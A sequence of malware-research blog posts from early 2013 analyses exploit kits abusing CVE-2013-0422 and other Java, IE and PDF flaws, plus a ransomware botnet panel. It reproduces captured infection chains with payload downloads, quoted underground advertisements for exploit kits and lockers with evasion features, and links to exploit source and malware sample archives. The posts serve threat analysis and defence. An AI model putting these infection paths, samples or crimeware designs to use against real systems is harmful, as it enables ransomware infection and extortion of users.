GET http://fc70efc87b.tespena.lapy .pl:82/forum/viob.php?cnf=c
200 OK (application/octet-stream) fe1e6410aac2b6af1ab92d1301f0c4ff

<edit n 13/01/13 10:00 GMT+1>
SofosFO:
Seems it has just been integrated. Found many since 2 days, but first one integrating the CVE.
Have been told that it's integrated since at least 2013-01-11

SofosFO - CVE-2013-0422 Positive path

GET http://tropical.finale.ceapy-wirealtyseou .org/dank-cashier.html
200 OK (text/html)

GET http://tropical.finale.ceapy-wirealtyseou .org/psemzhFIKWDhIWDmhwGKhDyFppGwK/QmxmlmQlwUo00/packets.js
200 OK (text/html)

GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar
200 OK (application/java-archive)

GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar
200 OK (application/java-archive) c1638d5ee237fc3228121b389d1cd3b0

GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/4393992
200 OK (application/octet-stream)

ProPack Sploit Pack :

Thanks to to @switchingtoguns for that one.

Propack EK CVE-2013-0422 positive Path

GET http://46.30.42 .195/build2/doc/4yioqp.php
200 OK (text/html)

GET http://46.30.42 .195/build2/doc/axhncumubx.php?k=32203313104201
200 OK (application/java-archive)

GET http://46.30.42 .195/build2/doc/gneyipb.php?k=32203313104201
200 OK (application/java-archive)

GET http://46.30.42 .195/build2/doc/jxipmwgoksgu.php?k=32203313104201
200 OK (text/html) - (md5 if i find a way to clean chunked file)

GET http://46.30.42 .195/build2/doc/4mx57e.php?j=1&k=1
200 OK (application/octet-stream) ac91753182db3a9562a27bd78c95972e Zaccess

SofosFO Fiddler File: http://goo.gl/CB5mb
</edit n>


<edit n+2 13/01/13 21:00>
Sweet Orange :

Sweet Orange Positive Path on CVE-2013-0422 and Lucky Locker (aka Lyposit) call Home

GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/plugins.php?arrowwiki=988&profile=193&scripts=194&users=78&baseball=950&movies=698&photoshop=16
200 OK (text/html)

GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc
200 OK (application/x-java-archive)

GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/Fxptg
200 OK (application/x-java-archive)

GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc
200 OK (application/x-java-archive)

GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/Fxptg
200 OK (application/x-java-archive) (will provide md5 if i found a way to clean fiddler export)

GET http://rubefasttrack .info/products.php?info=53&mapa=334&classes=12&pages=677&sport=1251&hotel=81&free=178&intl=58&style=604&openparadise1=299
200 OK (application/octet-stream)

GET http://b4wd52ftevtwvd .org/ad4/?jlrhg=rFssAhgRAFQ4SDEAAQAAAAUQ1KCkeEiX
200 OK (application/octet-stream) (Lyposit/Lucky Locker call home)

SWT Fiddler file : http://goo.gl/4cDMy
</edit n+2>


<edit n+1 2012-01-13 - 19h GMT+1>
Have seens some stats from an EK featuring this CVE. % of successful infection was between 13-15% overall (double usual rates on that EK). In DK it seems the % is higher. From 25% to 30%. Have been told that one explanation could be that Banks require Java to login in that country
</edit n+1>


Source of the Exploit :
http://pastebin.com/raw.php?i=cUG2ayjh - Gdark - DamageLabs

Unverified Source of the Exploit Credits : Gdark - damagelabs

Files are now with public Password ( The default password almost everyone use for infected stuff ) . Will update this archive :
http://goo.gl/Oc1VA (Hubic - OVH)
http://goo.gl/tzjfr (Google Drive) Ctrl+s or File->Download to get the zip.
Note : All request for the public password in comment will be deleted.

Remove Java or disable plugins.
See :
Vulnerability Note VU#625617 - Solution part - Will Dorman - US-Certs
How do I disable Java in my web browser?  - Oracle - Java.com
<edit n+3 13/01/13> 
Patch is out. You can now update to 1.7u11

http://java.com/en/download/index.jsp
</edit3>

What is behind the curtains :
Look : The path to infection - Eye glance at the first line of "Russian Underground"

Some readings :
Vulnerability Summary for CVE-2013-0422 - NVD

Java MBeanInstantiator.findClass 0Day Analysis - Esteban Guillardoy - Immunity

Happy New Year From New Java Zero-Day - FireEye Blog - 2013-01-11
Nasty New Java Zero Day Found; Exploit Kits Already Have It - Michael Mimoso - ThreatPost - 2013-01-11
First Java 0day For The Year 2013 - Arseny Levin - SpiderLabs - 2013-01-11

Meet "Red Dot exploit toolkit"

January 20, 2013, 1:36 pm

≫ Next: New bullets (CVE-2012-0775 - CVE-2012-1889 - CVE-2012-1876(?) - CVE-2012-4792 ) in "Cool EK" Weapon

≪ Previous: 0 day 1.7u10 (CVE-2013-0422) spotted in the Wild - Disable Java Plugin NOW !

$

0

0

for thumbnail

Red Dot Login Screen

Advertised since Dec 21, 2012 on underground forum by user reddot.

Here is the text of the advert :
------------------------------------------

Функциональность.

[*] Статистика: основная, браузеры, операционные системы, эксплойты, страны, рефералы;
[*] Возможность отображения как всей статистики, так и раздленной на треды (потоки);
[*] На разные треды можно грузить отдельные файлы;
[*] Поддержка загрузки как EXE так и DLL файлов;
[*] Удобное управление тредами из администраторской панели.
Принимаются пожелания по расширению функциональности.

Скриншоты.

http://s005.radikal.ru/i210/1212/d9/7791c0530925.png
http://s017.radikal.ru/i429/1212/4c/46f7a6ee5fa8.png
статистика сгенерированная

Состав сплоитов в связке.

Java atomic cve-2012-0507
Java jax-ws cve-2012-5076
* мы не стали включать в связку устаревшие эксплойты, которые мало того,
что практически не дают пробива, но еще и вызывают больше палева. Если
на вашем трафике до сих пор дает хоть какой-то процент libtiff или еще
удивительнее mdac поищите другую связку.
** в случае выхода новых уязвимостей, боевые сплойты будут оперативно
добавлены в связку.

Требования к серверу.

Веб-сервер Apache с включенным "mod_rewrite"
PHP версии 5.3.x или выше
MySQL версии 5.1.x или выше

Цены.

Лицензия на полгода 700$ (бесплатные чистки на 1 месяц)
Лицензия на год 1200$ (бесплатные чистки на 2 месяца)
Месячный абонимент на чистки 300$
Вендор вправе изменить цены на продукт в любой удобный ему момент.

Для первых отзывов предоставим бесплатный тест на вашем сервере.

Контакты.

По всем интересующим вам вопросам убедительная просьба писать непосредственно
в указанные ниже контакты или использовать ЛС.

reddot@jabbim.com
------------------------------------------
Translated by google as
------------------------------------------

Functionality.

[*] Statistics: basic, browsers, operating systems, exploits, country, referrals;
[*] Ability to show how all the statistics and razdlennoy on threads (threads);
[*] The different threads can load individual files;
[*] Support for download as EXE and DLL files;
[*] Convenient control trade from the administrative panel.
Accepted feature requests.

Screenshots.

http://s005.radikal.ru/i210/1212/d9/7791c0530925.png
http://s017.radikal.ru/i429/1212/4c/46f7a6ee5fa8.png
Statistics generated

Composition sploitov in the bunch.

Java atomic cve-2012-0507
Java jax-ws cve-2012-5076
* We did not include a bunch of old exploits are not enough
that practically do not punching, but also cause more yellow. If
Insufficient traffic still gives at least some percentage of libtiff or more
mdac surprising find another bunch.
** In the event of new vulnerabilities, combat sployty will promptly
added to the bunch.

Server requirements.

Apache Web server with the included "mod_rewrite"
PHP version 5.3.x or higher
MySQL 5.1.x or higher

Prices.

License for six months, $ 700 (free cleaning for 1 month)
The license for the year 1200 $ (free cleaning for 2 months)
Monthly aboniment for cleaning $ 300
The vendor has the right to change the price of the product at any time convenient to him.

For the first review will provide a free test on your server.

Contacts.

For all the questions you are kindly requested to write directly
at the following contacts or use PM.

reddot@jabbim.com

------------------------------------------

Red Dot Statistics (screenshot provided in the advert)

Red Dot Management (screenshot provided in the advert)

First Contact is the only one where I got the payload (double exploitation btw - CVE-2012-5076 and CVE-2013-0422 ) :

Red Dot exploit toolkit first contact. Being pushed an Urausy Ransomware

sss00000.html Pure java, straightforward landing....

GET http://txsepuasq.wikaba .com/sss00000.html

200 OK (text/html)

GET http://txsepuasq.wikaba .com/x.jar

200 OK (text/plain) 1b57a201dead2f0cdf6343bb92c6a875

GET http://txsepuasq.wikaba .com/f.jar

200 OK (text/plain) a8600cbebee22095b18e24a0c1a2a0e2

GET http://txsepuasq.wikaba .com/f.jar

200 OK (text/plain)

GET http://88.80.196 .104/load.php?guid=ae2c8bcefa806db99bcb513596cb00cb&thread=sss00000&exploit=2&version=1.7.0_06&rnd=2117170144

200 OK (application/octet-stream)

GET http://txsepuasq .wikaba.com/x.jar

200 OK (text/plain)

GET http://88.80.196 .104/load.php?guid=ae2c8bcefa806db99bcb513596cb00cb&thread=sss00000&exploit=1&version=1.7.0_06&rnd=-306644403

200 OK (application/octet-stream)  161b1b40f5f2ef01bef49431d790b285 (Urausy or will gather Urausy)

Urausy NL Design (2013-01-20) More design on botnets.fr

Call home from Urausy :

GET http://aimfuck .biz/forum/lucxlvslrtyhkljdjnkhtjzxayrvqforqh-gzpv-pvys_hukh_zmyazt-trbltrmjysxkujgbqngnldflxuld-mvyh.php

200 OK (application/octet-stream)

** в случае выхода новых уязвимостей, боевые сплойты будут оперативно

добавлены в связку.

CVE-2013-0422 (exploit2) :

CVE-2013-0422 Positive path - Payload is called but empty reply.

f.jar implementing CVE-2013-0422 in JD Gui Nice URL  :)

GET http://rxhzvssfv.wikaba .com/sss00000.html

200 OK (text/html)

GET http://rxhzvssfv.wikaba .com/f.jar

200 OK (text/plain)

GET http://rxhzvssfv.wikaba .com/x.jar

200 OK (text/plain)

GET http://rxhzvssfv.wikaba .com/f.jar

200 OK (text/plain)

GET http://88.80.196 .104/load.php?guid=99cfe0981b8feb296bc8d8c5c2b33818&thread=sss00000&exploit=2&version=1.7.0_10&rnd=110586755

200 OK (application/octet-stream) (empty payload)

GET http://rxhzvssfv.wikaba .com/x.jar

200 OK (text/plain)

CVE-2012-0507 (exploit0) :

CVE-2012-0507 positive path (with empty payload) on Red Dot

GET http://hdwrj.wikaba .com/sss00000.html

200 OK (text/html)

GET http://hdwrj.wikaba .com/f.jar
200 OK (text/plain)

GET http://hdwrj.wikaba .com/x.jar
200 OK (text/plain)

GET http://hdwrj.wikaba .com/x.jar
200 OK (text/plain)

GET http://hdwrj.wikaba .com/x.jar
200 OK (text/plain)

GET http://hdwrj.wikaba .com/f.jar
200 OK (text/plain)

GET http://hdwrj.wikaba .com/x.jar
200 OK (text/plain)

GET http://88.80.196 .104/load.php?guid=a5ac237744923b25cb6cbb4b2bbf34b8&thread=sss00000&exploit=0&version=1.6.0_30&rnd=-1453720314
200 OK (application/octet-stream)

GET http://hdwrj.wikaba .com/f.jar
200 OK (text/plain)

GET http://hdwrj.wikaba .com/com/sun/org/glassfish/gmbal/util/GenericConstructor.class
200 OK (text/html)

CVE-2012-5076 (still inside despite CVE-2013-0422) (exploit1) :

In front of the Weapon with a CVE-2012-5076  (and CVE-2013-0422) vulnerable Armor, RedDot hit with the brand new bullet.

CVE-2012-5076 bullet seems to be in file x.jar ...I triggered it with jre-1.6u6 but with 1.7u7 seems have been shot down by CVE-2013-0422 bullet (exploit2)

Hidden golden bullet ?

jre17u11 warning triggered by Red Dot landing.

No.

Seems to features double-tilt counter system.

Files : (Have some file hosting trouble. Working on it )

http://goo.gl/Bje8g (Google Drive) Ctrl+s or File->Download to get the zip.  

New bullets (CVE-2012-0775 - CVE-2012-1889 - CVE-2012-1876(?) - CVE-2012-4792 ) in "Cool EK" Weapon

January 25, 2013, 7:08 pm

≫ Next: Briefly wave WhiteHole Exploit Kit hello...

≪ Previous: Meet "Red Dot exploit toolkit"

$

0

0

Once again guys behind the Cool EK are using (or trying to use) bullets never seen before in blind mass attack. The brand new one is :

snipshot from Mitre.org

CVE-2012-0775 :

"The JavaScript implementation in Adobe Reader and Acrobat 9.x before 9.5.1 and 10.x before 10.1.3 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors." CVE-2012-0775 on mitre.org
Thanks to Cert Lexsi for pointing me to the correct CVE and William Metcalf for confirming it.

After initiating "popular" usage of CVE-2011-3402 (Duqu like font drop), CVE-2012-5076, maybe CVE-2013-0422 ("new year 0 day"), Cool EK has integrated around 11th of January CVE-2012-1889, maybe CVE-2012-1876 (William Metcalf is not 100% sure but says all pieces are here for this CVE ) and maybe CVE-2012-4792.
(working on trying to remove those maybe)

Chris Wakelin's tweet after he noticed changes in the landing

Path over CVE-2012-1889, CVE-2012-1876(?), CVE-2012-4792(?) will look like :

GET http://5102ae6c0fb1c.adminhrservices .net/news/gardener.php
200 OK (text/html)

GET http://5102ae6c0fb1c.adminhrservices .net/news/pics/new.png

200 OK (application/x-msdownload)

One landing : http://pastebin.com/HRr2We2z
The "three IE CVE combo" deobfucated : http://pastebin.com/WXtgUHA6

Piece of what looks like CVE-2012-4792. Note the comment. VIPOLNYAT ODNIM KUSKOM (already there when spotted by Chris Wakelin)

ВЫПОЛНЯТЬ ОДНИМ КУСКОМ meaning "execute as holistic, unified code" (Thanks Aels)

CVE-2012-1889 part

Some part of what could be CVE-2012-1876

CVE-2012-1889/CVE-2012-1876/CVE-2012-4792 ShellCode after pylibemu Thanks as always to Markus and Angelo for the great tools

By the way, writing about Cool EK one thing i never noticed before : it's using also the old MDAC.

 "его оставили потому как он не крешит браузер, не палится аверами так как нам удалось его вычистить, и на старом ИЕ6 до сих пор работает как надо" written by the author when announcing Blackhole update to 2.0.

"leave him because he does not crash, do not palitsya Avery because we managed to clean up, and the old IE6 is still working as it should"

Double payload via CVE-2011-3402 - CVE-2006-003 on an outdated VM

CVE-2006-0003 - MDAC vuln is there also

But here is what has motivated this post, since 2013/01/24 a new infection path appeared involving a third unknown (not the CVE-2010-0188 nor CVE-2009-0927) PDF 

CVE-2012-0775 :
Right now those PDF are nicely managed by Wepawet :

http://wepawet.iseclab.org/view.php?hash=f4319bad179b45c7da5eac95f570837d&type=js

http://wepawet.iseclab.org/view.php?hash=e676c9cc6787505f1ae6149d6349f103&type=js

http://wepawet.iseclab.org/view.php?hash=2dcbbb8fc05f7c13f483af7d43db432e&type=js

Adobe Reader version based conditions (screenshot from Wepawet Analysis)

Enabler (screenshot from Wepawet Analysis)

(screenshot from Wepawet Analysis)

I plan to add more data here later. I prefer not talking now about the results of all the tests that have been made.

One popup seen triggering those CVEs

We'll need a summary of all the CVE featured in this Exploit Kit.

For the payload on the Cool EK studied here, as usual, it's Reveton Ransomware, which has also changed recently according to Malekal

Reveton modification spotted by Malekal

Files :
6 pdfs almost similar protected with default public pass :
http://goo.gl/IuvKi (ownCloud)
http://goo.gl/cR91s (Mega)
136 reveton including last one with random filename:
http://goo.gl/ZCcsc (Mega)


Reading :
Crimeware Author Funds Exploit Buying Spree - 2013-01-07 - Brian Krebs - krebsonsecurity.com
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio
More on Cool EK:
Big update for Cool EK - 2012-12-18
Cool-er Than Blackhole? - 2012-11-16 - Timo Hirvonen - F-Secure
CVE-2011-3402 and Cool Exploit Kit - 2012-11-28 - yomuds - a bunch of random security bits!
Cool EK : "Hello my friend..." CVE-2012-5076 - 2012-11-09
Cool Exploit Kit - A new Browser Exploit Pack with a "Duqu" like font drop - 2012-10-09


Post publication reading :
soon

Briefly wave WhiteHole Exploit Kit hello...

February 4, 2013, 7:17 am

≫ Next: Inside Multi-Botnet ver.4 c&c Panel

≪ Previous: New bullets (CVE-2012-0775 - CVE-2012-1889 - CVE-2012-1876(?) - CVE-2012-4792 ) in "Cool EK" Weapon

$

0

0

WhiteHole...

After Nice Pack, Cool EK,  Blackhole, Red Dot, Sweet Orange... Anyone, show me where is the Exploit Kit name generator (WhiteRabbit would have been a better name no ? )

I spotted it for the first time around the 16/01/2013. It's a CVE-2013-0422 son.

WhiteHole as spotted on 16/01/2013 Exploit Success, but infection fail Didn't noticed that "whole" parameter at that time.

I knew it was a work in progress seeing that somewhere:

Связка работает в тестово-релизном режиме. Проценты считаются, явадетект работает, файлы обновляются. После появления возможности редактирования можно будет релизить.

that  nezlooy translate as :

The bunch of exploits works in a test-release mode. Percent is considered, java-detect worked, the files are updated. After the appearance of editing features we'll create a release.

Advertised by "frostalex" since 29/01/2013

------------------------------------------

Основные особенности:

- Возможность работы за $ или за % от трафа (скоро будет внедрено);
- 2 режима работы (С защитой от АВ источников трафа и без)
- Защита ваших ресурсов от попадания в основные АВ: KIS, Avast. (TrendMicro в процессе обхода);
- Защита от Google Safebrowsing;
- Кластерное масштабируемое решение, держит большие объёмы;
- Возможность грузить 2 файла одновременно (теоретически можно хоть 20, но будет страдать пробив);
- Работа только с файлами, доступнми для скачивания через внешний урл. (возможности загрузить файл руками нет и не будет). Время апдейта раз в 15 минут;
- В статистику попадает весь траф, который имеет реф, а не только тот, который WinXP-8, сделано для того, чтобы реально оценивать качество трафа;
- Автоматическая замена апплетов при палеве (в резерве 5-6 обфусцированных версий апплетов, при палеве текущего, он заменяется на следующий по списку).


Тест связки: 50$, объём вприпципе не ограничен, но после 10-20к трафа сапорт может попросить вас определиться с дальнейшими действиями. Думаю этот объём достаточен для того, чтобы понять устраивает ли вас работа связки.

Аренда:
- до 200к в сутки: $200/неделя, $600/месяц
- до 500к в сутки: $400/неделя, $1200/месяц
- свыше 500к: $600/неделя, $1800/месяц
(ценовая политика может измениться)

При перебоях с работой делаем рефанд, пропорционально отработанному времени.

Нововведения, которые ожидаются в ближайшем будущем:
- Пробив через лоадер с детектированием АВ, установленных на машине пользователя (уменьшает пробив, но повышает конверт, посредством увеличения времени работы вашего софта и отсутствия необходимости часто криптовать софт);
- Добавление встроенной TDS с большими функциональными возможностями;
------------------------------------------
Translated by google and improved by nezlooy as :  (feedback welcome as usual)
------------------------------------------


Key features:

- Possibility to work for $ or% of the traffic (soon to be implemented);
- 2 modes (Secure traffic sources from AV, and no protection);
- Protect your resources from falling into the main AV: KIS, Avast. (TrendMicro in a process of traversal);
- Protection from Google Safebrowsing;
- Cluster scalable, holds large amounts;
- Possibility to load two files at once (theoretically be at least 20, but will suffer penetration);
- Work only with files available for downloading through the external URL. (possibility to download the file by hand never will be.) Time update every 15 minutes;
- The statistics gets all the traffic that has a ref, not just the one that WinXP-8, done in order to truly assess the quality of the traffic;
- Automatic replacement of applets upon detection (in a reserve 5-6 obfuscated version of the applet, upon detection of the current applet, it is replaced by the next in the list).

Test of bunch of exploits: $50, in theory, volume is not limited but after 10-20k traffic, support may ask you to decide on further action. I think this volume is sufficient to understand whether you are satisfied with the work of the bunch.

Rent:
- Up to 200k per day: $200 a week, $600 a month
- Up to 500k per day: $400 a week, $1,200 a month
- Over 500k: $600 a week, $1,800 a month
(pricing policy may change)

When malfunctions we'll make refunds in proportion to the time worked.

New features that are expected in the near future:
- Penetration through the loader with detection AV, which are installed on the user's machine (it reduces the penetration, but increases conversion by increasing the lifetime of your software and the need for frequent crypting);
- Adding a built-in TDS with more features;
------------------------------------------

Screenshot from WhiteHole statistics page for one thread (815648) from Official Topic Lot of love for java here

We'll do one unique pass.

Landing :

WhiteHole landing. Straightforward

Will do something like :

CVE-2013-0422 (jre17u10 vuln) positive Path Two payload drop

I guess most of us are thinking the exact same thing, but do not want to help him sorting that mess.

CVE-2012-5076 - java 5 :

Java5 featuring CVE-2012-5076

CVE-2011-3544 - java44 :

java44 featuring CVE-2011-3544

CVE-2012-4681 - java6 :

java6 featuring CVE-2012-4681

CVE-2012-1723 CVE-2013-0422 - java :

CVE-2013-0422 in java.jar

GET http://emlchzt.changeip .name/temp/newyear/3540b1d/?cmp=98
200 OK (text/html)

GET http://emlchzt.changeip .name/temp/newyear/a4e0b/?java=98
200 OK (text/html)

GET http://emlchzt.changeip .name/temp/newyear/Java.jar?java=98
200 OK (application/java-archive) 66309bba9240a469b77aa64110706e2b

GET http://emlchzt.changeip .name/temp/newyear/Java6.jar?java=98
200 OK (application/java-archive) abbbd4e44ca4f455d7d0a1f62201334f

GET http://emlchzt.changeip .name/temp/newyear/Java44.jar?java=98
200 OK (application/java-archive) 5af82f9e4a2c76cae1e85cfcd231fa99

GET http://emlchzt.changeip .name/temp/newyear/Java5.jar?java=98
200 OK (application/java-archive) 74da082a186ea8c0e9d61e6df477fab5

GET http://emlchzt.changeip .name/temp/newyear/1813491619/?whole=98
302 Found to http://emlchzt.changeip .name/temp/softl98.exe


GET http://emlchzt.changeip .name/temp/newyear/3540b1d/org.class
200 OK (text/html)

GET http://emlchzt.changeip .name/temp/newyear/1813491619/?whole=9802
302 Found to http://emlchzt.changeip.name/temp/pod.exe

GET http://emlchzt.changeip .name/temp/pod.exe
200 OK (application/x-msdos-program) c63877355c46858edfeaa974f0d735f7
Zaccess (other days got : a8b1cdcf5aebb56acb4c13f2a4516a9e and 67eb1d32b95a9bf0c685af9b6b3fa443 )

GET http://emlchzt.changeip .name/temp/newyear/3540b1d/com.class
200 OK (text/html)

GET http://emlchzt.changeip .name/temp/newyear/3540b1d/edu.class
200 OK (text/html)

GET http://emlchzt.changeip .name/temp/newyear/3540b1d/net.class
200 OK (text/html)

GET http://emlchzt.changeip .name/temp/newyear/1183133538/?whole=98
302 Found to http://emlchzt.changeip.name/temp/softl98.exe

GET http://emlchzt.changeip .name/temp/newyear/1813491619/?whole=9803
302 Found to http://emlchzt.changeip.name

GET http://emlchzt.changeip .name/temp/softl98.exe
200 OK (application/x-msdos-program) 82735d21324a9e838782257e4602a4e4
Urausy Ransomware. (other days got : fb593979b04f82c9578434b3908c7fe4 & b654247b3d3af59169a6d90433e14584 )

GET http://emlchzt.changeip .name/
200 This buggy server did not return headers ()

GET http://emlchzt.changeip .name/temp/newyear/1183133538/?whole=9802
302 Found to http://emlchzt.changeip.name/temp/pod.exe

GET http://emlchzt.changeip .name/temp/pod.exe
200 OK (application/x-msdos-program)

GET http://emlchzt.changeip .name/temp/newyear/1183133538/?whole=9803
302 Found to http://emlchzt.changeip.name

GET http://emlchzt.changeip .name/
200 This buggy server did not return headers ()


Files : (fiddler/payload/jar - public Password)
http://goo.gl/nYe67 (OwnCloud)

Inside Multi-Botnet ver.4 c&c Panel

February 7, 2013, 7:20 am

≫ Next: Cbeplay.P targets US and AT, now talks to UK Citizens

≪ Previous: Briefly wave WhiteHole Exploit Kit hello...

$

0

0

I wrote 2 months ago about Multi Locker being updated to ver.3 (stabily recognized by Microsoft as : Tobfy.H ), made a brief history and showed inside view
Since then the code of the locker and the server side have leaked on underground forum.
FretLine, the handyman of this stuff,  was not that happy and react on both the post of the "leak"  and his own official topic somewhere else, presenting apologize to his customers.

On the 25-01-2013 he announced the new version :

"snipshot" of his advert

Original text of the Advert :
------------------------------------------

Subject :  Multi-Botnet ver.4 (Loader, Locker). x32-x64, all windows support.
------------------------------------------
Приветствую всех, кто заглянул в эту тему.

Прошло уже много времени с момента, когда третья ветка нашего продукта утекла в открытый доступ. Уже было много сказано по поводу того, что люди, которые выложили мой бот - ган*оны и тд, по этому не будет останавливаться на этом. Хочу отметить только то, что я обещал всем моим клиентам и не только клиентам, что я вернусь с новой версией, с более крутой версией. Кто-то верил в это, кто-то говорил, что я не вернусь, кто-то материл и ругал меня, а кто-то даже блек написал) Но я сдержал обещание и вот теперь я тут с новым продуктом перед вами.

Итак начнем)

Что же мы сделали? По первых была проделана огромнейшая работа, я трудился не один, над ботом работала целая команда. Я решил покорять новый рынок, рынок лоадеров и перед мой командой стояла задача сделать охренительный бот с потрясающим отстуком. Мы добились своей цели, мы сделали по настоящему крутой лоадер с крутым локером, который обладает своеобразным буткитом и руткитом. Финальные тесты показали, что продукт имеет отстук в районе 93% со связки. А живучесть ботнета просто феноменальна. Ну а теперь давайте по порядку.

Винлокер:

1. С нуля написаный бот. Локер писали профессионалы, за основу взят совсем другой язык, другая архитектура. Отстук самого локера заметно вырос. Стабильность работы на высоте. Но теперь локер - это плагин к нашему лоадеру.
2. Реализована система моментальной блокировки, и самое важное моментальной разблокировки компьютера жертвы. Если помните, раньше после анлока приходилось жертву заставлять ребутнуть компьютер, теперь же после того как вы нажмете анлок в админке, компьютер жертвы моментально разблокируется и он продолжит работу с того места, с которого закончил. (Если конечно сам не будет дергаться и перезагружать.)
3. Внедрен ring-3 rootkit. Локер теперь просто так не снять, у нас теперь инжект в процессы и различные фишки по самовосстановлению.
4. Реализован своебразный буткит (не MBR). Теперь мы блокируем Безопасный режим не только в Win XP, но и в Win 7 и Win 8. Но стоит отметить, что данным метод нестабильно работает, если у жертвы включен UAC.
5. Внедрен алгоритм RC4-Encryption, теперь все очень хорошо шифруется между админкой и ботом. Уделили внимание и антиреверсу.
6. Добавлены Резервные урлы для отстука о который так долго нас просили, теперь при создание билды вы можете указать до 5 резервных урлов и в случае блокировки одной из админок никакой потери ботнета.
7. Локер вырос в размерах, но ничего страшного нет, так по умолчанию вы грузите сначала лоадер, а затем уже подгружаете локер в случае необходимости.
8. Новая админка объединенная с лоадером.
9. Лендинги на выбор, легенда адальт или не лицензионный софт. В зависимости от тематики вашего трафика.

Лоадер:

1. Подробная статистика по странам, по ботнету, по статусу ботов, по системам, по заданиям.
2. Загрузка, удаление, апдейт EXE или DLL с локального файла или удаленной ссылки
3. Поддержка разделения заданий по странам.
4. Полная поддержка всей линейки windows от 2000 до Win 8. x32-x64
5. ring-3 rootkit, скрытие процессов, файлы и записи в реестре от пользователя, only x32
6. Простейшее криптование, ничего внутри себя бот не содержит.
7. Размер ~30kb
8. Полная поддержка unicode
9. Добавлены обходы проектировок актуальных версий Avira, Avast, Касперский, Panda. На других не тестировали.
10. До 5 резервных урлов при билде.

Цена:

Multi-Loader+Multi-Locker = 1499$
Multi-Loader = 999$

Резервных урлов до 5 в билд.
Ребилд - Бесплатно.


Контакты:

1. support@profidns.net
2. ПМ
__________________
jabber: support@profidns.net fretline@on.ezjabber.com


------------------------------------------
Translated by Google as :
------------------------------------------

I welcome all who looked into this topic.

It's been a long time since when the third branch of our product leaked publicly available. It has already been a lot said about the fact that the people who have put my bot - gan * ones, and so on, this will not stop here. I want to note only that I promised to all my clients, not only to customers, I will be back with a new version, with a steeper version. Someone believed in it, someone said that I do not return, some of mother and swore at me, and some even wrote Black) But I kept my promise, and now I'm here with a new product to you.

Now let's begin)

What have we done? On the first huge work, I worked not one of a team working bot. I decided to conquer a new market, a market in front loaders and my team was to keep ohrenitelny bot stunning otstuk. We achieved our goal, we have made for really cool loader with steep Locker, which has a peculiar bootkit and rootkit. Final tests showed that the product has otstuk in 93% of the bunch. A botnet is phenomenal vitality. Now, let's order.

Winloker:

1. Unused contribute written robot. Locker wrote professionals, taken as a basis entirely different language, a different architecture. Otstuk locker itself has grown significantly. Stability of work at height. But now, locker - is a plugin for our loaders.
2. Implemented a system of instant lock, and the most important immediate release of the victim computer. If you remember, earlier after unlocking had to make a sacrifice rebutnut computer, but now when you click unlock in the admin panel, the victim's computer immediately released and it will continue from the point at which he graduated. (Unless of course he will not be jerky and reboot.)
3. Introduced ring-3 rootkit. Locker now do not just take off, we now inject into the processes and different chips to heal itself.
4. Implemented svoebrazny bootkit (not MBR). Now we block safe mode, not only in Win XP, but in Win 7 and Win 8. But it is worth noting that this method becomes unstable when the victim turned UAC.
5. Implemented algorithm RC4-Encryption, now everything is very well encrypted between the admin and bot. Anti-reverse and paid attention.
6. Added Backup URLs for otstuk about which we have been asked for so long, now when creating builds, you can specify up to 5 URLs backup in case one of the locking adminok no loss of zombies.
7. Locker has grown in size, but nothing serious, so by default you ship loader at first, and then are loading locker if necessary.
8. The new admin panel combined with the loader.
9. Landing on the choice, the legend adalt or licensed software. Depending on the topic of your traffic.

Loader:

1. Detailed statistics on the countries on the botnet, status bots, to systems for the task.
2. Upload, delete, update EXE or DLL file from a local or remote reference
3. Support for job separation by country.
4. Full support for the entire line of windows from 2000 to Win 8. x32-x64
5. ring-3 rootkit, hiding processes, files and registry entries from the user, only x32
6. Simple encryption, nothing inside the bot does not.
7. The size of ~ 30kb
8. Full support for unicode
9. Added workaround projections recent versions Avira, Avast, Kaspersky, Panda. On the other not tested.
10. Up to five backup URLs in build.

Price:

Multi-Loader + Multi-Locker = $ 1499
Multi-Loader = $ 999

Backup URLs to 5 build.
Rebuild - Free.


Contacts:

1. support@profidns.net
2. PM
__________________

jabber: support@profidns.net fretline@on.ezjabber.com



------------------------------------------

Login Screen (sound familiar ? yes it's based on Aldi bot Panel)

Statistics

Bots

Tasks

Command dropdown list in Tasks tab

Plugins

Settings

Winlocker - Vouchers

Winlocker - Control Tasks

Winlocker - Control Tasks - Command Dropdown list

C&C :

C&C Call after infection from NL

POST http://[..]/gate.php 200 OK (text/html)
GET http://[..]/admin/plugins/winlocker/plugin.uplgdat 200 OK (text/plain)
POST http://[..]/gate.php 200 OK (text/html)
POST http://[..]/admin/plugins/winlocker/gate.php 200 OK (text/html)
GET http://[..]/admin/plugins/winlocker/tds.php 302 Found to NL.php
GET http://[..]/admin/plugins/winlocker/NL.php 200 OK (text/html)
POST http://[..]/admin/plugins/winlocker/gate.php 200 OK (text/html)
GET http://[..]/admin/plugins/winlocker/img/nl/recet.css 200 OK (text/css)
GET http://[..]/admin/plugins/winlocker/img/nl/style.css 200 OK (text/css)
GET http://[..]/admin/plugins/winlocker/img/nl/ie7-nl.css 200 OK (text/css)
GET http://[..]/admin/plugins/winlocker/img/nl/nl.png 200 OK (image/png)
GET http://[..]/admin/plugins/winlocker/img/nl/bg.png 200 OK (image/png)
GET http://[..]/admin/plugins/winlocker/img/btn.jpg 200 OK (image/jpeg)
GET http://[..]/admin/plugins/winlocker/img/bbg.png 200 OK (image/png)
POST http://[..]/admin/plugins/winlocker/gate.php 200 OK (text/html)




User-Agent:

User-Agent: umbra

Files ?
Only once i find one that does not disclose this C&C

---

Cbeplay.P targets US and AT, now talks to UK Citizens

February 8, 2013, 7:36 am

≫ Next: Urausy: Colorfull design refresh (+HR) & EC3 Logo

